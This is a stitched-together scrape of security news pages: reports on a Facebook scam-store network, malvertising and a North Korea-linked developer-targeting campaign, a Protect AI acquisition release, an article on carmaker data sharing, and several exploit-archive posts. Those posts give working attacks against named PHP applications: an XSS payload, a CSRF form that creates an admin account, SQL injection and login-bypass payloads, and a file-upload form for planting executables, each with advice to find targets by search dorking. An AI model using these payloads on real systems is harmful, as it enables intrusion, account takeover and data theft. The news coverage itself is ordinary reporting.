Facebook users are the target of a scam e-commerce network that uses hundreds of fake websites to steal personal and financial data using brand impersonation and malvertising tricks.
Recorded Future's Payment Fraud Intelligence team, which detected the campaign on April 17, 2024, has given it the name ERIAKOS owing to the use of the same content delivery network (CDN) oss.eriakos[.]com.
"These

Online Fraud / Malvertising

Facebook users are the target of a scam e-commerce network that uses hundreds of fake websites to steal personal and financial data using brand impersonation and malvertising tricks.

Recorded Future's Payment Fraud Intelligence team, which detected the campaign on April 17, 2024, has given it the name ERIAKOS owing to the use of the same content delivery network (CDN) oss.eriakos\[.\]com.

"These fraudulent sites were accessible only through mobile devices and ad lures, a tactic aimed at evading automated detection systems," the company said, noting the network comprised 608 fraudulent websites and that the activity spans several short-lived waves.

A notable aspect of the sophisticated campaign is that it exclusively targeted mobile users who accessed the scam sites via ad lures on Facebook, some of which relied on limited-time discounts to entice users into clicking on them. Recorded Future said as many as 100 Meta Ads related to a single scam website are served in a day.

The counterfeit websites and ads have been found to mainly impersonate a major online e-commerce platform and a power tools manufacturer, as well as single out victims with bogus sales offers for products from various well-known brands. Another crucial distribution mechanism entails the use of fake user comments on Facebook to lure potential victims.

"Merchant accounts and related domains linked to the scam websites are registered in China, indicating that the threat actors operating this campaign likely established the business they use to manage the scam merchant accounts in China," Recorded Future noted.

This is not the first time criminal e-commerce networks have sprung up with an aim to harvest credit card information and make illicit profits off fake orders. In May 2024, a massive network of 75,000 phony online stores – dubbed BogusBazaar – was discovered to have made more than $50 million by advertising shoes and apparel by well-known brands at low prices.

Then last month, Orange Cyberdefense revealed a previously undocumented traffic direction system (TDS) called R0bl0ch0n TDS that's used to promote affiliate marketing scams through a network of fake shop and sweepstake survey sites with the goal of obtaining credit card information.

"Several distinct vectors are used for the initial dissemination of the URLs that redirect through the R0bl0ch0n TDS, indicating that these campaigns are likely carried out by different affiliates," security researcher Simon Vernin said.

The development comes as fake Google ads displayed when searching for Google Authenticator on the search engine have been observed redirecting users to a rogue site ("chromeweb-authenticators\[.\]com") that delivers a Windows executable hosted on GitHub, which ultimately drops an information stealer named DeerStealer.

What makes the ads seemingly legitimate is that they appear as if they are from "google.com" and the advertiser's identity is verified by Google, according to Malwarebytes, which said "some unknown individual was able to impersonate Google and successfully push malware disguised as a branded Google product as well."

Malvertising campaigns have also been spotted disseminating various other malware families such as SocGholish (aka FakeUpdates), MadMxShell, and WorkersDevBackdoor, with Malwarebytes uncovering infrastructure overlaps between the latter two, indicating that they are likely run by the same threat actors.

On top of that, ads for Angry IP Scanner have been used to lure users to fake websites, and the email address "goodgoo1ge@protonmail\[.\]com" has been used to register domains delivering both MadMxShell and WorkersDevBackdoor.

"Both malware payloads have the capability to collect and steal sensitive data, as well as provide a direct entry path for initial access brokers involved in ransomware deployment," security researcher Jerome Segura said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Facebook Ads Lead to Fake Websites Stealing Credit Card Information

PRESS RELEASE

SEATTLE -- July 31, 2024 – Protect AI, a leader in AI security, today announced the acquisition of SydeLabs, which specializes in the automated attack simulation (red teaming) of generative AI (GenAI) systems. This strategic acquisition enhances Protect AI's platform ability to test and improve LLM security and extends the company’s lead as the only provider of end-to-end AI security solutions.

SydeLabs: A Leader in AI Red Teaming

Generative AI and LLM adoption are revolutionizing industries. LLMs are being integrated into critical end user applications such as customer service, finance and healthcare. However the complexity and scale of the technology has exacerbated security concerns that traditional application security processes simply can not keep up with or address effectively. 

SydeLabs was founded less than a year ago by former product and engineering leads from Google and MPL, and has quickly established itself as a pioneer in the field of AI security. Based in Bangalore, India, SydeLabs has developed SydeBox, a cutting-edge product designed to provide comprehensive vulnerability assessments for GenAI systems. The talented team from SydeLabs will join Protect AI where they will continue to add local talent in Bangalore to complement our Seattle and Berlin based teams.

“Protect AI is continuously looking to add products to our AI security posture management platform that help our customers build a safer AI-powered world,” said Ian Swanson, CEO of Protect AI. “The acquisition of SydeLabs extends the Protect AI platform with unmatched red teaming capabilities and immediately provides our customers with the ability to stress test, benchmark and harden their large language models against security risks.” 

SydeBox will be integrated into the Protect AI Platform and rebranded as Protect AI Recon. Recon identifies potential vulnerabilities in LLMs, ensuring enterprises can deploy AI applications with confidence. Key features of Recon include no-code integration, model-agnostic scanning, and detailed threat profiling across multiple categories. Recon uses both an attack library and LLM agent based solution for red teaming and evaluating the security and safety of GenAI systems. Protect AI Recon aligns perfectly with the growing demand for robust AI security solutions, driven by formal guidance from NIST, MITRE, OWASP and CISA, as well as mandates like the Executive Order on AI Safety and Security and the EU AI Act.

“The combination of SydeLabs’ SydeBox and Protect AI’s platform provides customers a comprehensive defense-in-depth solution for building, managing, testing, deploying and monitoring LLMs,” said Ruchir Patwa, co-founder of SydeLabs. “We couldn’t be more excited about joining the Protect AI mission and the prospect of what we can achieve in terms of helping companies of all sizes adopt and deploy more secure LLMs and AI applications.”

The new Recon product will enable Protect AI to meet growing customer demand for robust AI security solutions. Customers will benefit from detailed threat profiling across jailbreaks, prompt injection attacks, input manipulations and other attack vectors, which are crucial for maintaining the integrity and security of AI systems. Recon covers six of the OWASP Top 10 for LLM applications.

“Recon, formally SydeBox, has enabled us to identify and fix security blindspots before deploying our GenAI solutions to ensure we are building the most secure and safe LLM powered applications, and that products we serve our customers are free from any security or safety loopholes,” Said Kiran Darisi, CTO and cofounder, AtomicWork.

This acquisition and new product, Recon, further enhances Protect AI’s position as the leader in the AI security market and AI Security Posture Management (AI-SPM) solutions, differentiating it from competitors and solidifying its market presence. More specifically when used alongside Layer, Protect AI’s LLM observability and monitoring solution, Recon enables organizations to harden the implementation of LLMs against the spectrum of emerging security concerns associated with GenAI usage. Partners and stakeholders will also gain from the enhanced security capabilities, ensuring that the entire AI ecosystem is better protected against potential threats.

About SydeLabs

SydeLabs is a pioneering AI security company specializing in automated red teaming for GenAI systems. Founded by former leaders from Google and MPL, SydeLabs has developed SydeBox, a leading product designed to identify and mitigate vulnerabilities in LLMs. SydeLabs’ products have been adopted by enterprises to make GenAI models and applications safe and secure, giving them the confidence to deploy these systems to production. The company is headquartered in Bangalore. 

About Protect AI

Protect AI empowers organizations to secure their AI applications with comprehensive AI Security Posture Management (AI-SPM) capabilities, enabling them to see, know, and manage their ML environments effectively. The Protect AI Platform offers end-to-end visibility, remediation, control, and governance, safeguarding AI/ML systems from security threats and risks. Founded by AI leaders from Amazon and Oracle, Protect AI is backed by top investors, including Acrew Capital, boldstart ventures, Evolution Equity Partners, Knollwood Capital, Pelion Ventures, 01 Advisors, StepStone Group, Samsung, and Salesforce Ventures. The company is headquartered in Seattle, with offices in Berlin and Bangalore. For more information, visit our website and follow us on LinkedIn and Twitter.

Protect AI Acquires SydeLabs to Red Team Large Language Models

Two US senators accuse carmakers of deceptive language and shifty practices in sharing and resale of driver data.

Source: CC7 via Shutterstock

Two US senators have called on the US Federal Trade Commission (FTC) to hold automakers accountable for sharing driver data without consent, highlighting the growing data privacy challenges — and deceptive verbiage from terms of service — associated with modern smart cars.

In a letter to the FTC (PDF) last week, Sens. Ron Wyden (D-Ore.) and Edward Markey (D-Mass.) used the data-sharing practices of General Motors, Honda, and Hyundai as symptomatic of an industrywide problem that needs immediate investigation.

**Data Sharing Without Consent**

All three vendors collected and sold driver information such as acceleration and braking data to Verisk, a data analytics company that used the information to prepare driver behavior reports that it then resold to insurance companies. By their own account, none of the automakers obtained informed consent from customers before sharing their information. Instead, they deliberately obscured their data-sharing relationship with Verisk in lengthy disclosures and made deceptive claims about how they would use driver data, the senators charged.

"The FTC should hold accountable the automakers, which shared their customers' data with data brokers without obtaining informed consent, as well as the data brokers, which resold data that had not been obtained in a lawful manner," their letter noted. "Given the high number of consumers impacted, and the outrageous manipulation of consumers using dark patterns, the FTC should also hold senior company officials responsible for their flagrant abuse of their customers' privacy."

The letter highlights just one aspect of what many say is a rapidly growing set of security and privacy issues around modern, highly connected software-defined vehicles. While such vehicles offer increased automation, autonomous capabilities, and highly customizable user experiences, they also collect an enormous amount of data that can be hard to protect and secure.

"Your vehicle knows your name, your home address, your debit/credit card info, how fast you drive, how hard you brake, what you ask its voice assistant, the locations you frequent and at what times," says Riley Keehn, lead regulatory and government affairs consultant for SBD Automotive, an automotive research and consulting firm. "Certain occupant detection and automated driving cameras and sensors can even see you and your surroundings."

The onboard storage of this sheer volume of personal and identifying information (PII) and sensitive data types make drivers and their vehicles the direct targets of cyberattacks. These attacks can happen via hardwired systems like the OBD-II port or even the headlights, connections to the vehicle via shared and insecure Wi-Fi networks, through electric vehicle charging stations, compromised aftermarket components, and other means, Keehn says.

Some of these risks can be addressed via security-by-design approaches and the implementation of industry best practices and regulations, such as UN R155 on Cybersecurity Management Systems (CSMS) and UN R156 on Software Update Management Systems (SUMS), ISO/SAE 21434:2021 on Cybersecurity Engineering for Road Vehicles, and other international and regional requirements, she notes.

**A Complete Lack of Consumer Privacy Protections?**

But where things can get messy is what happens to personal data after a vehicle collects it. "The US still lacks a comprehensive, general data privacy regulation comparable to the EU's GDPR, China's PIPL/DSL/CSL framework, and other global regulations that have adopted the GDPR's model and stringency," Keehn says.

The US largely relies on sector-specific regulations, such as HIPAA in healthcare, to address unique data privacy and security requirements. Individual states have filled that gap with their own data privacy laws, creating a patchwork of inconsistent rules, often exempting certain sectors and technologies. While some states may have clear requirements for how an original equipment manufacturer (OEM) must handle the storage, collection, sharing, and sale of data, other states may have different requirements or none at all, she says.

"This inconsistency and lack of national guidance in the US creates a host of risks at the business level and can foster an OEM culture where security stops with the vehicle," Keehn adds.

**Can the FTC Really Drive Change?**

David Brumley, CEO of software security firm ForAllSecure, says car companies should be required to ask for informed consent from drivers to share their information for advertising or for any other purpose not specific to delivering a required feature. 

"Over-the-air software updates? Probably being served from Amazon or Google. Maps? Probably from a third-party. Accurate position? It's not just GPS; often it's assisted with other metadata — like Swift Navigation — to increase accuracy," Brumley notes.

A car vendor might require some data, like location information, for instance, to provide services such as roadside assistance, traffic warnings, and autonomous driving. So there needs to be separate consent requirement for sharing such data and for sharing data for pure profit reasons, he says. "Second, we need a law that says companies must not limit functionality when someone opts out," he adds. "Someone shouldn't be able to force your consent so you can keep driving to work."

Brumley says it's unrealistic, however, to expect the FTC to drive much change. "They don't exercise their regulatory powers in other domains, and instead rely on free-market" dynamics, which won't help here, he says. "Where we may get a bump is EU regulations, which tend to be stricter.  We also need consumers to speak up that it impacts their buying decisions."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Smart Cars Share Driver Data, Prompting Calls for Federal Scrutiny

AMPLE BILLS version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : AMPLE BILLS v1.0 XSS Vulnerability                                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : app/invoice/mpdf/examples/formsubmit.php?1<ScRiPt>prompt(913011)</ScRiPt>[+] http://localhost/ample/app/invoice/mpdf/examples/formsubmit.php?1%3CScRiPt%3Eprompt(913011)%3C/ScRiPt%3EGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AMPLE BILLS 1.0 Cross Site Scripting

Aero CMS version 0.0.1 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Aero CMS v0.0.1 CSRF Vulnerability                                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://codeload.github.com/MegaTKC/AeroCMS/zip/refs/heads/master                                                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 9.[+] Set the target site link Save changes and apply . [+] infected file : admin/users.php?source=add_user[+] save code as poc.html .<form action="https://127.0.0.1/pepopecocom/admin/users.php?source=add_user" method="POST">  <div>    <label for="username">Username:</label>    <input type="text" id="username" name="username" required>  </div>  <div>    <label for="password">Password:</label>    <input type="password" id="password" name="password" required>  </div>  <div>    <label for="user_email">Email:</label>    <input type="email" id="user_email" name="user_email" required>  </div>  <div>    <label for="user_first_name">First Name:</label>    <input type="text" id="user_first_name" name="user_first_name" required>  </div>  <div>    <label for="user_last_name">Last Name:</label>    <input type="text" id="user_last_name" name="user_last_name" required>  </div>  <div>    <label for="user_image">Profile Image:</label>    <input type="file" id="user_image" name="user_image">  </div>  <div>    <label for="user_role">User Role:</label>    <select id="user_role" name="user_role" required>      <option value="admin">Admin</option>      <option value="editor">Editor</option>      <option value="subscriber">Subscriber</option>    </select>  </div>  <div>    <button type="submit" name="create_user">Create User</button>  </div></form>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Aero CMS 0.0.1 Cross Site Request Forgery

SchoolPlus LMS version 1.0 suffers from a remote SQL injection vulnerability.

    =============================================================================================================================================| # Title     : SchoolPlus LMS v1.0 SQL injection Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : index.php?project_type_id=1[+] https://www/127.0.0.1/demo/bccnorgnp/projects/index.php?project_type_id=1 <=== inject here[+] Parameter: project_type_id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: project_type_id=1 AND 5604=5604    Type: stacked queries    Title: MySQL < 5.0.12 stacked queries (BENCHMARK - comment)    Payload: project_type_id=1;SELECT BENCHMARK(5000000,MD5(0x45507849))#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: project_type_id=1 AND (SELECT 5053 FROM (SELECT(SLEEP(5)))tLpS)    Type: UNION query    Title: Generic UNION query (NULL) - 2 columns    Payload: project_type_id=-7152 UNION ALL SELECT NULL,CONCAT(0x717a766271,0x6e496a5078736e466d5662454c5a6a73517278504b4d786866495454786d56417073505956586b70,0x71716a6a71)-- ----Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SchoolPlus LMS 1.0 SQL Injection

AccPack Khanepani version 1.0 suffers from an insecure direct object reference vulnerability.

**AccPack Khanepani 1.0 Insecure Direct Object Reference**

Posted Jul 31, 2024

Authored by indoushka

AccPack Khanepani version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 760d2e5184238b42e8f1ba299d632f9a683af578d5af3fd433dd135eb0ceb06b

Download | Favorite | View

**AccPack Khanepani 1.0 Insecure Direct Object Reference**

    =============================================================================================================================================| # Title     : AccPack Khanepani v1.0 IDOR Vulnerability                                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : leads to the creation of a new file in the list.[+] use payload : cms/gallery/insert.php[+] http://127.0.0.1/jamiatulamanepalorgnp/cms/gallery/insert.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,223)
*   Arbitrary (16,842)
*   BBS (2,859)
*   Bypass (1,855)
*   CGI (1,033)
*   Code Execution (7,784)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,384)
*   DoS (25,024)
*   Encryption (2,389)
*   Exploit (53,098)
*   File Inclusion (4,257)
*   File Upload (990)
*   Firewall (822)
*   Info Disclosure (2,885)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (896)
*   Kernel (7,184)
*   Local (14,788)
*   Magazine (586)
*   Overflow (13,165)
*   Perl (1,435)
*   PHP (5,221)
*   Proof of Concept (2,381)
*   Protocol (3,724)
*   Python (1,631)
*   Remote (31,625)
*   Root (3,633)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,024)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,275)
*   SQL Injection (16,594)
*   TCP (2,440)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,921)
*   Web (9,953)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,239)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,084)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,580)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,432)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,710)
*   UNIX (9,432)
*   UnixWare (187)
*   Windows (6,668)
*   Other

AccPack Khanepani 1.0 Insecure Direct Object Reference

AccPack Cop version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : AccPack Cop v1.0 Auth By Pass Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/jamiatulamanepal.orgnp/cms/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AccPack Cop 1.0 SQL Injection

AccPack Buzz version 1.0 suffers from an arbitrary file upload vulnerability.

    =============================================================================================================================================| # Title     : AccPack Buzz v1.0 Remote File Upload Vulnerability                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .[+] use payload : <html><head>  <title>Add</title></head><body>  <div align="center"><form action="http://127.0.0.1/jamiatulamanepalorgp/cms/gallery/insert.php" method="POST"  enctype="multipart/form-data"><table>  <tr>    <td>Image</td><td>      <input type="file" name="image-upload" id="image-upload"></td>   </tr>   <tr>    <td>Status</td><td>      <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>      <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>    </td>   </tr>      <tr style='height:80'>    <td colspan="2"><input type='submit' value='Submit'><input type='reset' Value='Reset'></td>   </tr></table></form></div></body></html>[+] In the seventh line, we change the link to the target link.[+] Link to the uploaded files : cms/image/gallery/[+] The script renames the file to a number, and you always choose numbers starting from the number 9 and above.Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AccPack Buzz 1.0 Arbitrary File Upload

The threat actors behind an ongoing malware campaign targeting software developers have demonstrated new malware and tactics, expanding their focus to include Windows, Linux, and macOS systems.
The activity cluster, dubbed DEV#POPPER and linked to North Korea, has been found to have singled out victims across South Korea, North America, Europe, and the Middle East.
"This form of attack is an

Malware / Software Development

The threat actors behind an ongoing malware campaign targeting software developers have demonstrated new malware and tactics, expanding their focus to include Windows, Linux, and macOS systems.

The activity cluster, dubbed **DEV#POPPER** and linked to North Korea, has been found to have singled out victims across South Korea, North America, Europe, and the Middle East.

"This form of attack is an advanced form of social engineering, designed to manipulate individuals into divulging confidential information or performing actions that they might normally not," Securonix researchers Den Iuzvyk and Tim Peck said in a new report shared with The Hacker News.

DEV#POPPER is the moniker assigned to an active malware campaign that tricks software developers into downloading booby-trapped software hosted on GitHub under the guise of a job interview. It shares overlaps with a campaign tracked by Palo Alto Networks Unit 42 under the name Contagious Interview.

Signs that the campaign was broader and cross-platform in scope emerged earlier this month when researchers uncovered artifacts targeting both Windows and macOS that delivered an updated version of a malware called BeaverTail.

The attack chain document by Securonix is more or less consistent in that the threat actors pose as interviewers for a developer position and urge the candidates to download a ZIP archive file for a coding assignment.

Present with the archive is an npm module that, once installed, triggers the execution of an obfuscated JavaScript (i.e., BeaverTail) that determines the operating system on which it's running and establishes contact with a remote server to exfiltrate data of interest.

It's also capable of downloading next-stage payloads, including a Python backdoor referred to as InvisibleFerret, which is designed to gather detailed system metadata, access cookies stored in web browsers, execute commands, upload/download files, as well as log keystrokes and clipboard content.

New features added to the recent samples include the use of enhanced obfuscation, AnyDesk remote monitoring and management (RMM) software for persistence, and improvements to the FTP mechanism employed for data exfiltration.

Furthermore, the Python script acts as a conduit to run an ancillary script that's responsible for stealing sensitive information from various web browsers – Google Chrome, Opera, and Brave – across different operating systems.

"This sophisticated extension to the original DEV#POPPER campaign continues to leverage Python scripts to execute a multi-stage attack focused on exfiltrating sensitive information from victims, though now with much more robust capabilities," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#google